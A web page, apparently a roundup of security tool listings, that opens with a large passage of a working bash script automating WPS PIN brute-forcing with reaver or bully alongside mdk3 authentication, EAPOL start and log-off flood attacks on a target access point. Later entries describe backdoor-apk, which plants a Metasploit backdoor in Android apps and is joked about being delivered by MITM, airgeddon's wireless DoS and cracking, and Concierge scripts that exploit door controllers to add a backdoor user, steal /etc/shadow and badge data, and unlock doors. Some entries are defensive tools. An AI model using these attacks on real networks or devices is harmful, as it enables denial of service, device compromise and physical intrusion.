if [  "$RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS" = r ]; then
clear
MDK3_MAIN_MENU
fi
echo -e "\e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m"
sleep 3;
clear
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then 
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi 
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then 
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi 
}
###########################################################################
function EAPOL_START_FLOOD_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  EAPOL Start Flood Attack                                  x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL start       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_START_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m"`;
echo "$EAPOL_START_FLOOD_COMMAND";
read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_START_FLOOD; 
if [  "$RETURN_OPTION_FOR_EAPOL_START_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m";
sleep 3;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then 
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi 
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then 
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi 
}
###########################################################################
function EAPOL_LOG_OFF_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  EAPOL Log Off Flood Attack                                x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL log off     x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
read -p "What is the MAC address of one of the client's connected?": TARGET_STATION
while [[ "$TARGET_STATION" = @(|) ]]; do
echo -e "\e[31m\e[1mYou cannot leave this field blank\e[0m";
echo
read -p "What is the MAC address of one of the client connected?": TARGET_STATION
done
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_LOG_OFF_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m"`;
echo "$EAPOL_LOG_OFF_FLOOD_COMMAND";
read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD; 
if [  "$RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m";
sleep 3;
clear;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then 
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi 
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then 
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi 
}
##########################################################################
function REAVER {
while :;do
echo y|$REAVER_COMMAND_LINE|tee -a /etc/reaver_tmp.txt > /dev/null
echo "Please Wait..." > /etc/reaver_tmp.txt 2> /dev/null;
sleep 5;
done
}
###########################################################################
function BULLY {

while :; do
stdbuf -o0 -e0 $BULLY_COMMAND_LINE|tee -a /etc/bully_tmp.txt > /dev/null 
echo "Please Wait..." > /etc/bully_tmp.txt 2> /dev/null
sleep 5;
done
}
###########################################################################
function MDK3_FOR_REAVER {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -a -z "$MDK3_KILLALL_1"  ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON1 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash  -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c  "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
done
###
while [ "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" -a -z "$MDK3_KILLALL_1" ]; do
killall -STOP reaver
echo -e "\e[36m\e[1mReaver detected 25 successive eapol failures!, pausing reaver and running flood attacks for 60 second!\e[0m" >> /etc/reaver_tmp.txt ;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON3 a -a $MAC -s 200";
##gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash  -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e " timeout 60 mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
###gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c  "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
sleep 60;
fi
killall -CONT reaver;
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
MDK3_KILLALL_1=`ps -A|grep mdk3`
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -o "$SUCCESSIVE_EAPOL_FAILURES" =  "[!] WARNING: 25 successive start failures" ]; then
KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
###for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
###kill -9 "$i"  &> /dev/null  ;
###kill  -9"$i"  &> /dev/null  ;
###killall mdk3 2> /dev/null 
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i"  &> /dev/null  ;
##kill -9 "$i"  &> /dev/null  ;
##done
killall mdk3 2> /dev/null 
fi
done
}
###########################################################################
function MDK3_FOR_BULLY {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WPS lockout reported, sleeping for 10 seconds ..." -a -z "$MDK3_KILLALL_1"  ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash  -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c  "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WPS lockout reported, sleeping for 10 seconds ..." ]; then
KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i"  &> /dev/null  ;
##kill  -9 "$i"  &> /dev/null ;
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i"  &> /dev/null  ;
##kill -9 "$i"  &> /dev/null  ;
##done
killall mdk3 2> /dev/null
fi
done
}

########################################################################################################################
function TAIL_FOR_REAVER {
while :; do
clear
timeout 10 tail -n 100 -f  /etc/reaver_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function TAIL_FOR_BULLY {
while :; do
clear
timeout 10 tail -n 100 -f  /etc/bully_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function AIREPLAY {
while :; do
aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -Q -q3 2>> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null;
echo "Please Wait..." >> /etc/aireplay_tmp.txt 2> /dev/null
sleep 1;
done
}
###########################################################################
MDK3_MAIN_MENU

Source: https://github.com/r0bag

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.
Usage:

git clone https://github.com/dana-at-cp/backdoor-apk && cd backdoor-apk
cd backdoor-apk
./backdoor-apk.sh [your apk file]

Now you can upload it using MITM technique :-) (Just for education purpose right?yeah.. lets rock)

Source: https://github.com/dana-at-cp

changelog v3.41dev:
+ Show network cards chipset while selecting interface
+ Some language strings changed
+ License updated to GPL3+
+ Added Open Document SpreadSheet for easy translation to be used by collaborating translators
+ System of prefixes and colors for hints and strings pending of translation [PoT]

airgeddon This is a multi-use bash script for Linux systems to audit wireless networks.

airgeddon menu

Features:
+ Interface mode switcher (Monitor-Managed).
+ DoS over wireless networks with different methods.
+ Assisted Handshake file capture.
+ Cleaning and optimizing Handshake captured files.
+ Offline password decrypt on WPA/WPA2 captured files (dictionary and bruteforce).
+ Compatibility with many Linux distros (see requirements section).
+ Easy targeting and selection in every section.
+ Controlled Exit. Cleaning tasks and temp files. Option to keep monitor mode if desired.
+ Multilanguage support and autodetect OS language feature (see supported languages section).
+ Help hints in every zone/menu for easy use.
+ Autoupdate. Script checks for newer version if possible.

Requirements
+ Bash version 4 or later needed.

Tested on these 100% compatible Linux distros:
-Kali. 2.0 and 2016.1
-Wifislax. 4.11.1 and 4.12
-Backbox. 4.5.1
-Parrot. 2.2.1
-Blackarch 2016.01.10
-Cyborg Hawk 1.1

Usage:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon && cd airgeddon
chmod +x airgeddon.sh
./airgeddon.sh

Update:
git pull origin master

Source: https://github.com/v1s1t0r1sh3r3 | Our Post Before

Fenrir is a simple IOC scanner bash script. It allows scanning Linux/Unix/OSX systems for the following Indicators of Compromise (IOCs):
+ Hashes
** MD5, SHA1 and SHA256 (using md5sum, sha1sum, sha -a 256)
+ File Names
** string – checked for substring of the full path, e.g. “temp/p.exe” in “/var/temp/p.exe”
+ Strings
** grep in files
+ C2 Server
** checking for C2 server strings in ‘lsof -i’ and ‘lsof -i -n’ output
+ Hot Time Frame
** using stat in different modes – define min and max epoch time stamp and get all files that have been created in between

fenrir

Latest Changelog v0.5.2:
– String extract in output
– release, issue and uname in output
– Syslog output disabled by default (to avoid false positives)
– C2 check in lsof enabled by default
– More interesting extensions

Basic characteristics:
* Bash Script
* No installation or agent needed
* Uses common tools to extract attributes (e.g. md5sum, grep, stat in different modes)
* Intended to run on any Linux / Unix / OS X with Bash
* Low footprint – Ansible playbook with RAM drive solution
* Smart exclusions (file size, extension, certain directories) speeds up the scan process

Why Fenrir?
+ FENRIR is the 3rd tool after THOR and LOKI. THOR is our full featured APT Scanner with many modules and export types for corporate customers. LOKI is a free and open IOC scanner that uses YARA as signature format.
+ The problem with both predecessors is that both have certain requirements on the Linux platform. We build THOR for a certain Linux version in order to match the correct libc that is required by the YARA module. LOKI requires Python and YARA installed on Linux to run.
+ We faced the problem of checking more than 100 different Linux systems for certain Indicators of Compromise (IOCs) without installing an agent or software packages. We already had an Ansible playbook for the distribution of THOR on a defined set of Linux remote systems. This playbook creates a RAM drive on the remote system, copies the local program binary to the remote system, runs it and retrieves the logs afterwards. This ensures that the program’s footprint on the remote system is minimal. I adapted the Ansible playbook for Fenrir. (it is still untested)

Usage & Download from git:

git clone https://github.com/Neo23x0/Fenrir && cd Fenrir
./fenrir.sh [your path folder]

Update:
git pull origin master

Source: https://github.com/Neo23x0

BULLET-PROOF YOUR “OWNER-ACCESS-ONLY” LINUX SERVER FROM HACKERS WITH IPTABLES AND ROBUST SHELL SCRIPTING.

Bare minimum packages and whitelist-only access to your Linux home surveillance &/or automation system such as NEST or WeMo, or your WiFi router (if port or other forwarding, or external management are in use). ENTERPRISES: Let POOFITEE create the blacklists you need! Run POOFITEE on an external ip address that should have no incoming traffic, then share with your firewalls the ipset blacklist it creates.

No hackers can get any data or communication at all out of your system when this firewalling solution is installed on it:
* Only you know how to get your remote IP address permitted by whitelist to become an authorized source address. This will be by port knocking or email. Source addresses not whitelisted are ignored as effectively as them being explicitly blacklisted. All 65536 of your ports are invisible to them.
* Only you know the IP address of your system – it’s emailed to you fresh every time your systems gets it changed by DHCP.
* You will be notified immediately by email/text of any and all source addresses that your system places on its whitelist or removes from its blacklist.
* You would still continue to use passwords and ssh keys as is prudent even for systems without firewall protection.

All this PLUS the simplicity and robustness inherent in a bare iptables and scripting-only Linux solution, PLUS the option of building an explicit blacklist of first-time hacking packets in real-time for your reference and curiosity, if your system has enough RAM.

POOFITEE

Firewalling options this install script should be able to alter from the script set defaults:
— Stop probe logging/blacklisting to save space or if you’re just not curious – comment out the crontab entry and kill the process
— Open specific ports to offer public services
— Force single-interface firewalling even though two interfaces exist
— Alter the IP address of the private-side interface from 192.168.3.1
— Dynamic re-config of interfaces: external may swap with internal and private IP on external my become public & vice versa for laptops, etc. Triggered on whenever change in external interface
— Allow installer to specify which internal interface to trust
— accommodate multiple vlans

Why anyone would want a blacklist to accumulate:
1) differentiate between neutral and hostile when providing public services,
2) assist in selecting ports for knock sequence or email knock by which are least probed,
3) just to have a blacklist so admin/owner can blacklist their own choices of Internet addresses,
4) give to other firewall software in a multi-box environment,
5) sales, marketing, winning a bet, or other reasons to prove the point to self or others,
6) curiousity

Usage & Download from git:

git clone https://github.com/kenneth558/POOFITEE && cd POOFITEE
chmod a+x POOFITEE
./POOFITEE

Source: https://github.com/kenneth558

usbdeath is a small script inspired by usbkill( https://github.com/hephaest0s/usbkill), “an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer”. The main differences are:
+ it is written in bash, so literally anyone with basic programming skills could read through the code and audit it
+ it is not a daemon, just a rule file manipulation script, all monitoring stuff are done by existing udev daemon
+ it uses more identification values for usb devices (if usb device has these values) such as name and serial number

usbdeath

Dependencies:
* bash
* modern linux os with udev and probably systemd

Usage and download from git:

git clone https://github.com/trpt/usbdeath && cd usbdeath
or wget https://github.com/trpt/usbdeath/blob/master/usbdeath
chmod a+x usbdeath
./usbdeath

Source: https://github.com/trpt

Concierge is A collection (eventually) of Physical Access Control and Monitoring attacks and utilities. These will all eventually evolve into a more effective and user friendly set of tools, but for now, simple bash scripts will do the job.

Dependencies:
+ All Linux Machine
+ Nmap
+ git

Mainly Script:
* eh400.sh
Usage: ./eh400.sh <action>
Actions: exploit, cleanup
All necessary variables will be entered during execution of the script.
exploit: Leverages command injection vulnerability to:
+ Modify .htpasswd file to a known password value for “admin” user. This allows manual control via http(s).
+ Pushes remote agent script to the EH400 (used by triggeragent.sh). This allows for control via cmdline.
+ Pulls IdentDB badge store and /etc/shadow from EH400.
+ Also checks /etc/shadow for known default password values.
cleanup: Removes all copied or created files and restores the original htpasswd file.

* vertx.sh
Usage: ./vertx.sh <action>
Actions: exploit, cleanup
All necessary variables will be entered during execution of the script.
exploit: Leverages command injection vulnerability to:
+ Creates new user, ‘z’, with password ‘backdoor’, and grants web access privs. This allows manual control via http(s).
+ Pushes remote agent script to the VertX EVO (used by triggeragent.sh). This allows for control via cmdline.
+ Pulls IdentDB badge store and /etc/passwd from VertX EVO.
+ Also checks /etc/passwd for known default password values.
clean up: Removes all copied or created files and deletes the ‘z’ user.

* agentdeploy.sh
Usage: ./agentdeploy.sh <ip> <mac>
This script can be used for both EH400 and VertX EVO door controllers. This is a lighter weight script that only deploys the agent script for use with triggeragent.sh.

* triggeragent.sh
Usage: ./triggeragent.sh <ip> <mac> <action>
Actions: unlock, lock, blink
Example: ./triggeragent.sh 10.1.1.10 00:11:22:33:44:55 unlock
Leverages a previously deployed agent script deployed to lock/unlock a door controller’s associated locking mechanism or blink the LEDs on the associated reader. Further testing against V1000 required.
‘blink’ flashes the LED lights on an associated RFID reader. Used to help locate the exploited door. This has only been tested on HID iClass (and similar) readers, but should work on any reader with external LEDs.

* agentclean.sh
Usage: ./agentclean.sh <ip> <mac>
